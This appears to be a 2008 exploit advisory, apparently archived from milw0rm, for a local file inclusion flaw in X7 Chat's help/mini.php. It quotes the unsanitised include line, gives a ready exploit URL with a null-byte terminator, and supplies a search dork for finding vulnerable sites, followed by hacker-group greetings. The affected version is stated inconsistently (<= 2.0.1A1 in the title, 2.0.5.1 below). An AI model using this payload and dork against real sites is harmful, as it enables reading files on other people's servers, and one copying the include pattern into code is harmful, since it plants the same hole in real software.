==================================================================== [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability Software : X7 Chat version 2.0.5.1 Vendor : http://x7chat.com/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com ==================================================================== [o] Vulnerable file help/mini.php include("./help/{$_GET['help_file']}"); [o] Exploit http://localhost/[path]/help/mini.php?help_file=[LFI]%00 [o] Dork "powered by x7 chat" ==================================================================== [o] Greetz MainHack BrotherHood [ www.mainhack.com ] VOP Crew [ Vaksin13 OoN_BoY Paman ] H312Y yooogy mousekill }^-^{ k1tk4t skulmatic olibekas ulga Cungkee str0ke ==================================================================== # milw0rm.com [2008-09-27]